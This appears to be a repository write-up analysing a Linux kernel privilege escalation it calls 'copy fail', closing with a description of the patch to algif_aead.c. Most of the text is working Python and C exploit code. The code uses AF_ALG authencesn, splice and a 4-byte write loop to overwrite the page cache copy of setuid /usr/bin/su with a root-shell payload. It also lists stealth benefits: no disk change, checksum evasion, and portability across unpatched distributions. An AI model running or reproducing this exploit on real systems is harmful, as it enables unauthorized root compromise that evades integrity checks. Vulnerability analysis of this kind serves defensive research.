The idea of this repo is to analyse and document the copy fail exploit and patch
Overwrite the page cache copy of /usr/bin/su with a tiny ELF payload that calls
setuid(0) + execve("/bin/sh"). Since execve() reads from page cache and not
disk, running su after the corruption spawns a root shell. The disk file is never touched.
AF_ALG exposes the kernel crypto subsystem to unprivileged userspace. No root required.
a = socket.socket(38, 5, 0)int alg_fd = socket(38, SOCK_SEQPACKET, 0);authencesn is an IPsec crypto template that uses the destination
scatterlist as scratch space — the root cause of the bug.
a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))struct sockaddr_alg sa = {
.salg_family = AF_ALG,
.salg_type = "aead",
.salg_name = "authencesn(hmac(sha256),cbc(aes))"
};
bind(alg_fd, (struct sockaddr *)&sa, sizeof(sa));Key content doesn't matter — it just needs to be the right length. Authsize = 4 controls the tag region size, which controls where the scratch write lands.
setsockopt(SOL_ALG, 1, d('0800010000000010' + '0'*64)) # set key
setsockopt(SOL_ALG, 5, None, 4) # authsize = 4 bytesuint8_t key[40] = { 0x08,0x00,0x01,0x00,0x00,0x00,0x00,0x10 };
setsockopt(alg_fd, SOL_ALG, 1, key, sizeof(key));
setsockopt(alg_fd, SOL_ALG, 5, NULL, 4);AF_ALG uses a two-socket model:
- binding socket → configure the algorithm
- request socket → send/receive actual data
request_socket, _ = a.accept()int req_fd = accept(alg_fd, NULL, NULL);Open /usr/bin/su read-only. No write permissions needed.
The file descriptor is a handle that leads the kernel to the page cache entries.
target = os.open("/usr/bin/su", 0)int target = open("/usr/bin/su", O_RDONLY);splice requires at least one pipe end — the pipe is a mandatory intermediary that holds page cache references while they travel to the AF_ALG socket.
pipe_r, pipe_w = os.pipe()int pipefd[2];
pipe(pipefd);Zero-copy transfer: page cache pages of /usr/bin/su are referenced
in the pipe buffer. No data is copied — only pointers to the pages.
os.splice(target, pipe_w, offset, offset_src=0)int64_t off_src = 0;
do_splice(f, &off_src, pipefd[1], NULL, offset, SPLICE_F_MOVE);Page cache references move from the pipe into the AF_ALG TX scatterlist.
Due to the 2017 in-place optimization (req->src = req->dst), those same
pages end up in the writable destination scatterlist.
os.splice(pipe_r, request_socket.fileno(), offset)do_splice(pipefd[0], NULL, req_fd, NULL, offset, SPLICE_F_MOVE);Bytes 4-7 of the AAD = seqno_lo = the 4 bytes that will be written into the page cache.
MSG_MORE (32768) tells the kernel to wait for the splice before processing.
request_socket.sendmsg(
[b"A"*4 + payload_chunk], # AAD: bytes 0-3 filler, bytes 4-7 = value to write
[(SOL_ALG, 3, b'\x00'*4), # IV
(SOL_ALG, 2, b'\x10'+b'\x00'*19), # op = decrypt
(SOL_ALG, 4, b'\x08'+b'\x00'*3)], # assoclen
32768 # MSG_MORE
)sendmsg(req_fd, &msg, 32768);Calling recv() tells the kernel to run the decrypt operation now.
try:
request_socket.recv(8 + t)
except:
passuint8_t recv_buf[8 + t];
recv(req_fd, recv_buf, sizeof(recv_buf), 0);
// return value ignored — HMAC failure is expected11. authencesn reads seqno_hi (bytes 0-3) → b"AAAA" (ignored)
12. authencesn reads seqno_lo (bytes 4-7) → your 4 bytes
13. authencesn writes seqno_lo at dst[assoclen + cryptlen]
→ crosses output boundary into chained page cache pages
→ 4 bytes written into /usr/bin/su page cache ✓
14. HMAC computed → fails (ciphertext was fake)
→ recv() returns error
→ write is NOT rolled back
Loop advances offset by 4 each iteration until entire ELF payload is written.
i = 0
while i < len(payload):
write_4bytes(target, i, payload[i:i+4])
i += 4size_t i = 0;
while (i < total) {
size_t chunk = (i + 4 <= total) ? 4 : total - i;
write_4bytes(target, (int)i, buf + i, chunk);
i += 4;
}Kernel loads /usr/bin/su from page cache (now contains payload).
Since su is setuid root, payload runs as UID 0.
os.system("su")system("su");- Page cache write never marks the page dirty → no disk writeback
- On-disk file unchanged → file integrity tools (checksums) see nothing
recv()returns an error → looks like a failed crypto operation, not an attack- No new processes, no suspicious files written
- No per-distro offsets or hardcoded addresses
- No kernel version checks
- Works on Ubuntu, RHEL, Amazon Linux, SUSE — any unpatched kernel
Removes the in-place optimization from algif_aead.c:
// before: page cache pages reachable through writable dst
req->src = req->dst
// after: separate scatterlists, page cache pages stay read-only
req->src = TX_SGL // page cache pages (read path only)
req->dst = RX_SGL // user recv buffer (write path)authencesn's scratch write now lands in the RX buffer (user memory) instead of page cache.